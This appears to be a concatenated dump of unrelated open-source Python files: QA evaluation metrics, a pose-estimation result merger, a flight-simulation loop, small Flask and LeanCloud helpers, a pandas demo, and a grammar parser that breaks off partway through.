if app.debug: use_debugger = True
try:
# Disable Flask's debugger if external debugger is requested
use_debugger = not(app.config.get('DEBUG_WITH_APTANA'))
except:
pass
app.run(use_debugger=use_debugger,
use_reloader=use_debugger, threaded=True, port=8080)
| 1.921875 | 2 |
language/labs/drkit/evaluate.py | Xtuden-com/language | 1,199 | 3441 | <gh_stars>1000+
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Evaluate lazy slot filling results."""
import codecs
import collections
import gzip
import json
import random
import re
import string
import unicodedata
from absl import app
from absl import flags
from bert import tokenization
from language.labs.drkit import input_fns
import numpy as np
import tensorflow.compat.v1 as tf
PUNCTUATION = frozenset(string.punctuation)
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string("ground_truth_file", None,
"File with ground truth answers.")
flags.DEFINE_string("predicted_answers_file", None,
"File with predicted answers from model.")
flags.DEFINE_string("relation_counts_file", None,
"JSON file with relation counts.")
class NumpyEncoder(json.JSONEncoder):
"""Special json encoder for numpy types."""
def default(self, obj):
if isinstance(obj, (np.int_, np.intc, np.intp, np.int8, np.int16, np.int32,
np.int64, np.uint8, np.uint16, np.uint32, np.uint64)):
return int(obj)
elif isinstance(obj, (np.float_, np.float16, np.float32, np.float64)):
return float(obj)
elif isinstance(obj, (np.ndarray,)): # This is the fix
return obj.tolist()
return json.JSONEncoder.default(self, obj)
def wikimovie_eval_fn(dataset, results, name_map, output_prediction_file,
**kwargs):
"""Compute evaluation metrics for OneHopDataset or TwoHopDataset.
Args:
dataset: An object of type OneHopDataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples}
gt_ques = {ex.qas_id: ex.question_text for ex in dataset.examples}
gt_entity = {ex.qas_id: ex.subject_entity[0] for ex in dataset.examples}
inf_chain = {ex.qas_id: ex.inference_chain for ex in dataset.examples}
# Compute basic metrics.
num_correct = 0.
all_predictions = {}
chain2stats = {ch: [0., 0.] for ch in inf_chain.values()}
incorrect_results, correct_results = [], []
for result in results:
qas_id = result["qas_ids"]
prediction = result["predictions"]
if prediction in gt_answer[qas_id]:
num_correct += 1
chain2stats[inf_chain[qas_id]][0] += 1
correct_results.append({
"qas_id": result["qas_ids"],
"question": gt_ques[qas_id],
"answers": gt_answer[qas_id],
"subject": gt_entity[qas_id],
"inf-chain": inf_chain[qas_id],
"predictions": result["predictions"],
})
for hop in range(3):
if "sparse_%d" % hop in result:
correct_results[-1].update({
"sparse_%d" % hop: result["sparse_%d" % hop],
"dense_%d" % hop: result["dense_%d" % hop],
"mention_%d" % hop: result["mention_%d" % hop],
"entity_%d" % hop: result["entity_%d" % hop],
"sparse_scores_%d" % hop: result["sparse_scores_%d" % hop],
"dense_scores_%d" % hop: result["dense_scores_%d" % hop],
"mention_scores_%d" % hop: result["mention_scores_%d" % hop],
"entity_scores_%d" % hop: result["entity_scores_%d" % hop],
})
else:
incorrect_results.append({
"qas_id": result["qas_ids"],
"question": gt_ques[qas_id],
"answers": gt_answer[qas_id],
"subject": gt_entity[qas_id],
"inf-chain": inf_chain[qas_id],
"predictions": result["predictions"],
})
for hop in range(3):
if "sparse_%d" % hop in result:
incorrect_results[-1].update({
"sparse_%d" % hop: result["sparse_%d" % hop],
"dense_%d" % hop: result["dense_%d" % hop],
"mention_%d" % hop: result["mention_%d" % hop],
"entity_%d" % hop: result["entity_%d" % hop],
"sparse_scores_%d" % hop: result["sparse_scores_%d" % hop],
"dense_scores_%d" % hop: result["dense_scores_%d" % hop],
"mention_scores_%d" % hop: result["mention_scores_%d" % hop],
"entity_scores_%d" % hop: result["entity_scores_%d" % hop],
})
chain2stats[inf_chain[qas_id]][1] += 1
all_predictions[qas_id] = name_map[str(prediction)]
accuracy = num_correct / len(all_predictions)
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
json.dump(
random.sample(incorrect_results, 100),
tf.gfile.Open(output_prediction_file + ".incorrect", "w"),
cls=NumpyEncoder)
json.dump(
random.sample(correct_results, 100),
tf.gfile.Open(output_prediction_file + ".correct", "w"),
cls=NumpyEncoder)
# Return metrics.
metrics = {
"accuracy": accuracy,
}
for ch, stats in chain2stats.items():
metrics["inference-chains-acc/" + ch] = stats[0] / stats[1]
return metrics
def multihop_eval_fn(dataset,
results,
name_map,
output_prediction_file,
supervision="mention",
**kwargs):
"""Compute evaluation metrics for OneHopDataset or TwoHopDataset.
Args:
dataset: An object of type OneHopDataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
supervision: Type of supervision used in the model.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_mentions = {ex.qas_id: ex.answer_mention[0] for ex in dataset.examples}
if supervision == "mention":
gt_answer = gt_mentions
else:
gt_answer = {ex.qas_id: ex.answer_entity[0] for ex in dataset.examples}
# Compute basic metrics.
num_correct = 0.
all_predictions = {}
for result in results:
qas_id = result["qas_ids"]
prediction = result["predictions"]
if prediction == gt_answer[qas_id]:
num_correct += 1
all_predictions[qas_id] = name_map[str(prediction)]
accuracy = num_correct / len(all_predictions)
# Compute advanced metrics.
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
micro, macro, _, _ = compute_scores(dataset.gt_file, output_prediction_file)
# Return metrics.
metrics = {
"accuracy": accuracy,
"micro-p": micro[0],
"micro-r": micro[1],
"micro-f": micro[2],
"macro-p": macro[0],
"macro-r": macro[1],
"macro-f": macro[2],
}
return metrics
def hotpot_eval_fn(dataset, results, name_map, output_prediction_file,
**kwargs):
"""Compute evaluation metrics for HotpotQADataset.
Args:
dataset: An object of type HotpotQADataset.
results: A list of result dicts from running estimator.predict.
name_map: A mapping from prediction indices to text strings.
output_prediction_file: File to store predictions to.
**kwargs: Variable keyword arguments.
Returns:
metrics: A dict mapping metric names to values.
"""
del kwargs
# Collect ground truth answers.
gt_answer = {ex.qas_id: ex.answer_entity for ex in dataset.examples}
gt_types = {ex.qas_id: ex.inference_chain for ex in dataset.examples}
# Compute basic metrics.
num_correct = {2: 0., 5: 0., 10: 0., 20: 0.}
aps = []
no_answer = 0.
all_predictions = {}
bridge_acc, comp_acc = 0., 0.
bridge_tot, comp_tot = 0, 0
single_acc = 0.
layer_weights = np.zeros_like(results[0]["layer_probs"])
num_layer_entities = {i: 0. for i in range(layer_weights.shape[0])}
num_new_entities = {i: 0. for i in range(layer_weights.shape[0])}
for result in results:
qas_id = result["qas_ids"].decode("utf-8")
preds = result["top_idx"]
scores = result["top_vals"]
ans = gt_answer[qas_id]
my_type = gt_types[qas_id]
if my_type == "bridge":
bridge_tot += 1
else:
comp_tot += 1
ranks = np.where(np.in1d(preds, ans))[0]
ranks = np.sort(ranks)
ap = 0.
cnt = 0.
if any(rr < 10 for rr in ranks):
single_acc += 1
if ranks.shape[0] == 0:
no_answer += 1
for rr in ranks:
cnt += 1
ap += cnt / (rr + 1)
if ans:
aps.append(ap / len(ans))
else:
aps.append(0.)
found = False
for key in [2, 5, 10, 20]:
if found or np.in1d(ans, preds[:key]).all():
num_correct[key] += 1
found = True
if key == 10:
if my_type == "bridge":
bridge_acc += 1
else:
comp_acc += 1
# Non-accuracy stats
layer_weights += result["layer_probs"]
layer_entities = {i: set() for i in range(layer_weights.shape[0])}
all_predictions[qas_id] = {}
for i in range(layer_weights.shape[0]):
layer_entities[i] = set(
[ee for ee in result["layer_%d_ent" % i] if ee != -1])
num_layer_entities[i] += len(layer_entities[i])
num_new_entities[i] += len(layer_entities[i] - layer_entities[0])
# all_predictions[qas_id]["layer_%d" % i] = [
# name_map[str(ee)] for ee in layer_entities[i]]
all_predictions[qas_id]["predictions"] = [
(name_map[str(pred)], str(scores[i])) for i, pred in enumerate(preds)
]
tf.logging.info("Evaluated %d items", len(all_predictions))
accuracy = {
key: (num_correct[key] / len(all_predictions)) for key in num_correct
}
# Compute advanced metrics.
json.dump(all_predictions, tf.gfile.Open(output_prediction_file, "w"))
# Return metrics.
metrics = {"eval/@%d" % key: accuracy[key] for key in accuracy}
metrics["accuracy"] = accuracy[10]
metrics["eval/map"] = sum(aps) / len(all_predictions)
metrics["eval/bridge_accuracy"] = bridge_acc / bridge_tot
metrics["eval/comparison_accuracy"] = comp_acc / comp_tot
metrics["analysis/single_accuracy"] = single_acc / len(all_predictions)
metrics["analysis/no_answers"] = no_answer / len(all_predictions)
for i in range(layer_weights.shape[0]):
metrics["analysis/layer_weight_%d" %
i] = layer_weights[i] / len(all_predictions)
metrics["analysis/num_entities_%d" %
i] = num_layer_entities[i] / len(all_predictions)
metrics["analysis/num_new_entities_%d" %
i] = num_new_entities[i] / len(all_predictions)
return metrics
def normalize_answer(s):
"""Lower text and remove punctuation, articles and extra whitespace."""
def remove_articles(text):
return re.sub(r"\b(a|an|the)\b", " ", text)
def white_space_fix(text):
return " ".join(text.split())
def remove_punc(text):
exclude = set(string.punctuation)
return "".join(ch for ch in text if ch not in exclude)
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s))))
def f1_score(prediction, ground_truth):
"""Compute F1 score."""
prediction_tokens = normalize_answer(prediction).split()
ground_truth_tokens = normalize_answer(ground_truth).split()
common = collections.Counter(prediction_tokens) & collections.Counter(
ground_truth_tokens)
num_same = sum(common.values())
if num_same == 0:
return 0
precision = 1.0 * num_same / len(prediction_tokens)
recall = 1.0 * num_same / len(ground_truth_tokens)
f1 = (2 * precision * recall) / (precision + recall)
return f1
def exact_match_score(prediction, ground_truth):
"""Compute EM score."""
return normalize_answer(prediction) == normalize_answer(ground_truth)
def metric_max_over_ground_truths(metric_fn, prediction, ground_truths):
scores_for_ground_truths = []
for ground_truth in ground_truths:
my_score = metric_fn(prediction, ground_truth)
scores_for_ground_truths.append(my_score)
return max(scores_for_ground_truths)
def read_predictions(prediction_file):
with tf.gfile.Open(prediction_file) as f:
predictions = json.load(f)
return predictions
def read_answers(gold_file):
"""Read ground truth answers."""
answers = {}
f = tf.gfile.Open(gold_file)
if gold_file.endswith(".gz"):
f = gzip.GzipFile(fileobj=f)
for i, line in enumerate(f):
example = json.loads(line)
if i == 0 and "header" in example:
continue
for qa in example["qas"]:
answers[qa["qid"]] = qa["answers"]
f.close()
return answers
def evaluate(answers, predictions, skip_no_answer=False):
"""Compute F1 and EM scores."""
f1 = exact_match = total = 0
for qid, ground_truths in answers.items():
if qid not in predictions:
if not skip_no_answer:
message = "Unanswered question %s will receive score 0." % qid
print(message)
total += 1
continue
total += 1
prediction = predictions[qid]
exact_match += metric_max_over_ground_truths(exact_match_score, prediction,
ground_truths)
f1 += metric_max_over_ground_truths(f1_score, prediction, ground_truths)
exact_match = 100.0 * exact_match / total
f1 = 100.0 * f1 / total
return {"exact_match": exact_match, "f1": f1}
def mrqa_eval_fn(dataset_file, predictions_file, skip_no_answer=True):
answers = read_answers(dataset_file)
predictions = read_predictions(predictions_file)
return evaluate(answers, predictions, skip_no_answer)
def compute_scores(ground_truth_file, predicted_answers_file):
"""Read predictions and ground truth and return P, R, F."""
telemetry, incorrect = read_results(ground_truth_file, predicted_answers_file)
micro = aprf(telemetry)
relationwise = aprf_relationwise(telemetry)
macro = sum([val[0] for _, val in relationwise.items()])
macro = macro / len(relationwise)
return micro, macro, relationwise, incorrect
def read_results(ground_truth_file, predicted_answers_file):
"""Read results and ground truth and return data structure with stats."""
with codecs.getreader("utf-8")(tf.gfile.GFile(ground_truth_file,
"r")) as read:
data_ = {}
for line in read:
item = json.loads(line.strip())
if isinstance(item["relation"], dict):
relation = item["relation"]["wikidata_id"]
elif isinstance(item["relation"], list):
relation = (
item["relation"][0]["wikidata_id"] + "_" +
item["relation"][1]["wikidata_id"])
data_[item["id"]] = [relation, item["subject"]["wikidata_id"]]
if "is_impossible" in item and item["is_impossible"]:
continue
if item["object"] is None:
continue
if isinstance(item["object"]["mention"], dict):
data_[item["id"]] += [item["object"]["mention"]["text"]]
if "name" in item["object"]:
data_[item["id"]] += [item["object"]["name"]]
if "aliases" in item["object"]:
data_[item["id"]] += item["object"]["aliases"].keys()
with codecs.getreader("utf-8")(tf.gfile.GFile(predicted_answers_file,
"r")) as fin:
predictions = json.load(fin)
telemetry, incorrect = [], []
n = 0
for key in data_:
if key not in predictions:
continue
g = data_[key][2:]
a = predictions[key]
m = data_[key][:2]
stats = score(g, a)
telemetry.append([m[0], m[1], g, a, stats])
if stats[0] == 0. and stats[3] > 0.:
incorrect.append(key)
n += 1
return telemetry, incorrect
def aprf_relationwise(g):
"""Returns precision, recall and F score for each relation."""
rel_to_stats = collections.defaultdict(list)
for item in g:
rel_to_stats[item[0]].append(item)
rel_to_scores = {}
for rel, stats in rel_to_stats.items():
rel_to_scores[rel] = [aprf(stats), len(stats)]
return rel_to_scores
def aprf(g):
"""Returns precision, recall and F of the given statistics."""
tp, _, sys_pos, real_pos = sum([x[-1] for x in g])
if tp == 0:
p = r = f = 0.0
else:
p = tp / float(sys_pos) if sys_pos > 0 else 0.
r = tp / float(real_pos) if real_pos > 0 else 0.
f = 2 * p * r / (p + r)
return np.asarray([p, r, f])
def score(gold, answer):
"""Compares answer to ground truth to return TP / FP stats."""
if gold:
gold = set([simplify(g) for g in gold])
answer = simplify(answer)
result = np.zeros(4)
if gold:
result[3] += 1
if answer in gold:
result[0] += 1
else:
if not answer:
result[1] += 1
if answer:
result[2] += 1
return result
def strip_accents_and_punct(text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
if char in PUNCTUATION:
continue
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def simplify(answer):
"""Pre-process answer string."""
toks = []
articles = {"the", "a", "an", "and", ""}
for t in answer.strip().lower().split():
tok = strip_accents_and_punct(t)
if tok not in articles:
toks.append(tok)
return "".join(toks)
def rare_relation_scores(relationwise, relation2counts):
"""Print statistics of rare relations for different thresholds."""
for thresh in [5, 100, 500, 1000]:
freq_stats, freq_total = np.array([0., 0., 0.]), 0
rare_stats, rare_total = np.array([0., 0., 0.]), 0
for relation, (stats, _) in relationwise.items():
if relation2counts.get(relation, 0) < thresh:
rare_stats += stats
rare_total += 1
else:
freq_stats += stats
freq_total += 1
rare_stats /= rare_total
freq_stats /= freq_total
print(
"Threshold =", thresh, "rare", rare_total,
"Micro-P %.3f Micro-R %.3f Micro-F %.3f" %
(rare_stats[0], rare_stats[1], rare_stats[2]), "freq", freq_total,
"Micro-P %.3f Micro-R %.3f Micro-F %.3f" %
(freq_stats[0], freq_stats[1], freq_stats[2]))
def main(_):
eval_type = "hotpot"
if eval_type == "hotpot":
test_hotpot_eval()
else:
micro, macro, rwise, _ = compute_scores(FLAGS.ground_truth_file,
FLAGS.predicted_answers_file)
print("Micro", micro)
print("Macro", macro)
if FLAGS.relation_counts_file is not None:
r2c = json.load(tf.gfile.Open(FLAGS.relation_counts_file))
rare_relation_scores(rwise, r2c)
if __name__ == "__main__":
app.run(main)
| 1.898438 | 2 |
tests/adv/test_pop_sfrd.py | jlashner/ares | 10 | 3442 | """
test_pop_models.py
Author: <NAME>
Affiliation: UCLA
Created on: Fri Jul 15 15:23:11 PDT 2016
Description:
"""
import ares
import matplotlib.pyplot as pl
PB = ares.util.ParameterBundle
def test():
# Create a simple population
pars_1 = PB('pop:fcoll') + PB('sed:bpass')
pop_fcoll = ares.populations.GalaxyPopulation(**pars_1)
#pop_fcoll_XR = ares.populations.GalaxyPopulation(**pars_1)
# Mimic the above population to check our different SFRD/SED techniques
sfrd_pars = {'pop_sfr_model': 'sfrd-func'}
sfrd_pars['pop_sfrd'] = pop_fcoll.SFRD
sfrd_pars['pop_sfrd_units'] = 'internal'
sed = PB('sed:toy')
sed['pop_Nion'] = pop_fcoll.src.Nion
sed['pop_Nlw'] = pop_fcoll.src.Nlw
# pop_Ex?
sed['pop_ion_src_igm'] = False
sed['pop_heat_src_igm'] = False
pars_2 = sed + sfrd_pars
pop_sfrd = ares.populations.GalaxyPopulation(**pars_2)
assert pop_fcoll.SFRD(20.) == pop_sfrd.SFRD(20.), "Error in SFRD."
# Check the emissivities too
#print(pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#print(pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6))
#assert pop_fcoll.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6) \
# == pop_sfrd.PhotonLuminosityDensity(20., Emin=10.2, Emax=13.6), \
# "Error in photon luminosity density."
if __name__ == '__main__':
test()
| 1.890625 | 2 |
venv/lib/python3.7/site-packages/leancloud/engine/utils.py | corgiclub/CorgiBot_telegram | 0 | 3443 | # coding: utf-8
import time
import hashlib
import leancloud
from leancloud._compat import to_bytes
__author__ = 'asaka <<EMAIL>>'
def sign_by_key(timestamp, key):
return hashlib.md5(to_bytes('{0}{1}'.format(timestamp, key))).hexdigest()
| 1.984375 | 2 |
AirplaneLQR/chap4LQR/mavsim_chap4.py | eyler94/ee674AirplaneSim | 1 | 3444 | <filename>AirplaneLQR/chap4LQR/mavsim_chap4.py<gh_stars>1-10
"""
mavsimPy
- Chapter 4 assignment for <NAME>, PUP, 2012
- Update history:
12/27/2018 - RWB
1/17/2019 - RWB
"""
import sys
sys.path.append('..')
import numpy as np
import parameters.simulation_parameters as SIM
from chap2.mav_viewer import mav_viewer
# from chap2.video_writer import video_writer
from chap3.data_viewer import data_viewer
from chap4.mav_dynamics import mav_dynamics
from chap4.wind_simulation import wind_simulation
from time import sleep
# initialize the visualization
VIDEO = False # True==write video, False==don't write video
mav_view = mav_viewer() # initialize the mav viewer
data_view = data_viewer() # initialize view of data plots
if VIDEO == True:
video = video_writer(video_name="chap4_video.avi",
bounding_box=(0, 0, 1000, 1000),
output_rate=SIM.ts_video)
# initialize elements of the architecture
wind = wind_simulation(SIM.ts_simulation)
mav = mav_dynamics(SIM.ts_simulation)
# initialize the simulation time
sim_time = SIM.start_time
# main simulation loop
# sleep(5)
print("Press Command-Q to exit...")
while sim_time < SIM.end_time:
#-------set control surfaces-------------
if(sim_time<25):
delta_e = -0.1
delta_t = 1.0 # 0.5
delta_a = 0.0 # 0.0
delta_r = 0.0 # 0.005
delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector
else:
delta_e = -0.3
delta_t = 1.0#0.5
delta_a = 0.01#0.0
delta_r = 0.00025#0.005
delta = np.array([[delta_e, delta_t, delta_a, delta_r]]).T # transpose to make it a column vector
#-------physical system-------------
current_wind = wind.update() # get the new wind vector
# print("current wind: ", current_wind)
mav.update_state(delta, current_wind) # propagate the MAV dynamics
#-------update viewer-------------
mav_view.update(mav.msg_true_state) # plot body of MAV
data_view.update(mav.msg_true_state, # true states
mav.msg_true_state, # estimated states
mav.msg_true_state, # commanded states
SIM.ts_simulation)
if VIDEO == True:
video.update(sim_time)
#-------increment time-------------
sim_time += SIM.ts_simulation
if VIDEO == True:
video.close()
| 2.53125 | 3 |
core/self6dpp/tools/ycbv/ycbv_pbr_so_mlBCE_Double_3_merge_train_real_uw_init_results_with_refined_poses_to_json.py | THU-DA-6D-Pose-Group/self6dpp | 33 | 3445 | <gh_stars>10-100
import os.path as osp
import sys
import numpy as np
import mmcv
from tqdm import tqdm
from functools import cmp_to_key
cur_dir = osp.dirname(osp.abspath(__file__))
PROJ_ROOT = osp.normpath(osp.join(cur_dir, "../../../../"))
sys.path.insert(0, PROJ_ROOT)
from lib.pysixd import inout, misc
from lib.utils.bbox_utils import xyxy_to_xywh
from lib.utils.utils import iprint, wprint
id2obj = {
1: "002_master_chef_can", # [1.3360, -0.5000, 3.5105]
2: "003_cracker_box", # [0.5575, 1.7005, 4.8050]
3: "004_sugar_box", # [-0.9520, 1.4670, 4.3645]
4: "005_tomato_soup_can", # [-0.0240, -1.5270, 8.4035]
5: "006_mustard_bottle", # [1.2995, 2.4870, -11.8290]
6: "007_tuna_fish_can", # [-0.1565, 0.1150, 4.2625]
7: "008_pudding_box", # [1.1645, -4.2015, 3.1190]
8: "009_gelatin_box", # [1.4460, -0.5915, 3.6085]
9: "010_potted_meat_can", # [2.4195, 0.3075, 8.0715]
10: "011_banana", # [-18.6730, 12.1915, -1.4635]
11: "019_pitcher_base", # [5.3370, 5.8855, 25.6115]
12: "021_bleach_cleanser", # [4.9290, -2.4800, -13.2920]
13: "024_bowl", # [-0.2270, 0.7950, -2.9675]
14: "025_mug", # [-8.4675, -0.6995, -1.6145]
15: "035_power_drill", # [9.0710, 20.9360, -2.1190]
16: "036_wood_block", # [1.4265, -2.5305, 17.1890]
17: "037_scissors", # [7.0535, -28.1320, 0.0420]
18: "040_large_marker", # [0.0460, -2.1040, 0.3500]
19: "051_large_clamp", # [10.5180, -1.9640, -0.4745]
20: "052_extra_large_clamp", # [-0.3950, -10.4130, 0.1620]
21: "061_foam_brick", # [-0.0805, 0.0805, -8.2435]
}
obj_num = len(id2obj)
obj2id = {_name: _id for _id, _name in id2obj.items()}
if __name__ == "__main__":
new_res_path = osp.join(
PROJ_ROOT,
"datasets/BOP_DATASETS/ycbv/test/init_poses/",
"resnest50d_online_AugCosyAAEGray_mlBCE_DoubleMask_ycbv_pbr_100e_so_GdrnPbrPose_withYolov4PbrBbox_wDeepimPbrPose_ycbv_train_real_uw.json",
)
if osp.exists(new_res_path):
wprint("{} already exists! overriding!".format(new_res_path))
res_root = "output/deepim/ycbvPbrSO/FlowNet512_1.5AugCosyAAEGray_AggressiveR_ClipGrad_fxfy1_Dtw01_LogDz_PM10_Flat_ycbvPbr_SO/"
iter_num_test = 4
pkl_paths = [
"01_02MasterChefCan/inference_model_final_wo_optim-2de2b4e3/ycbv_002_master_chef_can_train_real_uw/results.pkl",
"02_03CrackerBox/inference_model_final_wo_optim-41082f8a/ycbv_003_cracker_box_train_real_uw/results.pkl",
"03_04SugarBox/inference_model_final_wo_optim-e09dec3e/ycbv_004_sugar_box_train_real_uw/results.pkl",
"04_05TomatoSoupCan/inference_model_final_wo_optim-5641f5d3/ycbv_005_tomato_soup_can_train_real_uw/results.pkl",
"05_06MustardBottle/inference_model_final_wo_optim-6ce23e94/ycbv_006_mustard_bottle_train_real_uw/results.pkl",
"06_07TunaFishCan/inference_model_final_wo_optim-0a768962/ycbv_007_tuna_fish_can_train_real_uw/results.pkl",
"07_08PuddingBox/inference_model_final_wo_optim-f2f2cf73/ycbv_008_pudding_box_train_real_uw/results.pkl",
"08_09GelatinBox/inference_model_final_wo_optim-a303aa1e/ycbv_009_gelatin_box_train_real_uw/results.pkl",
"09_10PottedMeatCan/inference_model_final_wo_optim-84a56ffd/ycbv_010_potted_meat_can_train_real_uw/results.pkl",
"10_11Banana/inference_model_final_wo_optim-83947126/ycbv_011_banana_train_real_uw/results.pkl",
"11_19PitcherBase/inference_model_final_wo_optim-af1c7e62/ycbv_019_pitcher_base_train_real_uw/results.pkl",
"12_21BleachCleanser/inference_model_final_wo_optim-5d740a46/ycbv_021_bleach_cleanser_train_real_uw/results.pkl",
"13_24Bowl/inference_model_final_wo_optim-f11815d3/ycbv_024_bowl_train_real_uw/results.pkl",
"14_25Mug/inference_model_final_wo_optim-e4824065/ycbv_025_mug_train_real_uw/results.pkl",
"15_35PowerDrill/inference_model_final_wo_optim-30d7d1da/ycbv_035_power_drill_train_real_uw/results.pkl",
"16_36WoodBlock/inference_model_final_wo_optim-fbb38751/ycbv_036_wood_block_train_real_uw/results.pkl",
"17_37Scissors/inference_model_final_wo_optim-5068c6bb/ycbv_037_scissors_train_real_uw/results.pkl",
"18_40LargeMarker/inference_model_final_wo_optim-e8d5867c/ycbv_040_large_marker_train_real_uw/results.pkl",
"19_51LargeClamp/inference_model_final_wo_optim-1ea79b34/ycbv_051_large_clamp_train_real_uw/results.pkl",
"20_52ExtraLargeClamp/inference_model_final_wo_optim-cb595297/ycbv_052_extra_large_clamp_train_real_uw/results.pkl",
"21_61FoamBrick/inference_model_final_wo_optim-d3757ca1/ycbv_061_foam_brick_train_real_uw/results.pkl",
]
obj_names = [obj for obj in obj2id]
new_res_dict = {}
for obj_name, pred_name in zip(obj_names, pkl_paths):
assert obj_name in pred_name, "{} not in {}".format(obj_name, pred_name)
pred_path = osp.join(res_root, pred_name)
assert osp.exists(pred_path), pred_path
iprint(obj_name, pred_path)
# pkl scene_im_id key, list of preds
preds = mmcv.load(pred_path)
for scene_im_id, pred_list in preds.items():
for pred in pred_list:
obj_id = pred["obj_id"]
score = pred["score"]
bbox_est = pred["bbox_det_xyxy"] # xyxy
bbox_est_xywh = xyxy_to_xywh(bbox_est)
refined_pose = pred["pose_{}".format(iter_num_test)]
pose_est = pred["pose_0"]
cur_new_res = {
"obj_id": obj_id,
"score": float(score),
"bbox_est": bbox_est_xywh.tolist(),
"pose_est": pose_est.tolist(),
"pose_refine": refined_pose.tolist(),
}
if scene_im_id not in new_res_dict:
new_res_dict[scene_im_id] = []
new_res_dict[scene_im_id].append(cur_new_res)
inout.save_json(new_res_path, new_res_dict)
iprint()
iprint("new result path: {}".format(new_res_path))
| 1.695313 | 2 |
tests/test_app/rest_app/rest_app/services/account_service.py | jadbin/guniflask | 12 | 3446 | <filename>tests/test_app/rest_app/rest_app/services/account_service.py
from flask import abort
from guniflask.context import service
from ..config.jwt_config import jwt_manager
@service
class AccountService:
accounts = {
'root': {
'authorities': ['role_admin'],
'password': '<PASSWORD>',
}
}
def login(self, username: str, password: str):
if username not in self.accounts or self.accounts[username]['password'] != password:
return abort(403)
account = self.accounts[username]
token = jwt_manager.create_access_token(authorities=account['authorities'], username=username)
return {
'username': username,
'access_token': token,
}
def get(self, username: str):
if username not in self.accounts:
return abort(404)
return {
'username': username,
'authorities': self.accounts[username]['authorities']
}
| 2.28125 | 2 |
test/library/draft/DataFrames/psahabu/AddSeries.py | jhh67/chapel | 1,602 | 3447 | <gh_stars>1000+
import pandas as pd
I = ["A", "B", "C", "D", "E"]
oneDigit = pd.Series([1, 2, 3, 4, 5], pd.Index(I))
twoDigit = pd.Series([10, 20, 30, 40, 50], pd.Index(I))
print "addends:"
print oneDigit
print twoDigit
print
print "sum:"
print oneDigit + twoDigit
print
I2 = ["A", "B", "C"]
I3 = ["B", "C", "D", "E"]
X = pd.Series([0, 1, 2], pd.Index(I2))
Y = pd.Series([10, 20, 0, 0], pd.Index(I3))
print "addends:"
print X
print Y
print
print "sum:"
print X + Y
print
A = pd.Series(["hello ", "my ", "name", "is", "brad"])
B = pd.Series(["world", "real"])
print "addends:"
print A
print B
print
print "sum: "
print A + B
| 3.28125 | 3 |
nelly/parser.py | shawcx/nelly | 0 | 3448 | <gh_stars>0
#
# (c) 2008-2020 <NAME>
#
import sys
import os
import re
import logging
import nelly
from .scanner import Scanner
from .program import Program
from .types import *
class Parser(object):
def __init__(self, include_dirs=[]):
self.include_dirs = include_dirs + [ os.path.join(nelly.root, 'grammars') ]
self.pwd = []
# setup the scanner based on the regular expressions
self.scanner = Scanner(os.path.join(nelly.root, 'rules.lex'))
# container for the compiled program
self.program = Program()
self.tokens_stack = []
self.groups_stack = []
self.group_stack = []
self.groups = None
self.group = None
def Parse(self, grammarFile):
grammar = grammarFile.read()
self.pwd.append(os.path.dirname(grammarFile.name))
logging.debug('Parsing %s (%d bytes)', grammarFile.name, len(grammar))
self.tokens = self.scanner.Scan(grammar)
# keep a reference to the tokens for when included files are parsed
self.tokens_stack.append(self.tokens)
# iterate over all the tokens
while self.tokens:
(token,value,line,col) = self.tokens.Next()
# handle all the top-level tokens
if 'nonterminal' == token:
if value.startswith('::'):
value = value[2:]
self._nonterminal(Types.NONTERMINAL, value)
elif 'varterminal' == token:
if value.startswith('::'):
value = value[2:]
self._nonterminal(Types.VARTERMINAL, value)
elif 'include' == token:
self._include()
elif 'start_python_code' == token:
if r'<%pre' == value:
self.program.preamble.append(self._python_code('pre'))
elif r'<%post' == value:
self.program.postscript.append(self._python_code('post'))
else:
raise nelly.error('Please specify pre or post in code section')
elif 'start_comment' == token:
self._comment()
else:
raise nelly.error('Unhandled %s %s at %d:%d', token, repr(value), line, col)
self.tokens_stack.pop()
return self.program
def _nonterminal(self, _type, name):
# create a new container and add it to the program
nonterminal = Nonterminal(_type, name)
self.program.nonterminals[name] = nonterminal
(token,value,line,col) = self.tokens.Next()
# parse any optional arguments for the non-terminal
if 'lparen' == token:
while True:
(token,value,line,col) = self.tokens.Next()
if 'rparen' == token:
break
elif 'comma' == token:
continue
elif 'option' == token:
nonterminal.options.append(value)
if value == 'start':
self.program.start.append(name)
elif 'decorator' == token:
nonterminal.decorators.append(value[1:])
else:
raise nelly.error('Unknown option: %s %s', token, value)
(token,value,line,col) = self.tokens.Next()
if 'colon' != token:
raise nelly.error('Parse error, missing colon at line %d, column %d', line, col)
# parse zero or more expressions until a semicolon is found
self._expressions('pipe', 'semicolon', nonterminal)
def _expressions(self, delimiter, sentinel, nonterminal):
(token,value,line,col) = self.tokens.Peek()
expression = Expression((line,col))
while self.tokens:
(token,value,line,col) = self.tokens.Next()
if sentinel == token:
nonterminal.expressions.append(expression)
break
elif delimiter == token:
nonterminal.expressions.append(expression)
expression = Expression((line,col))
elif 'lparen' == token:
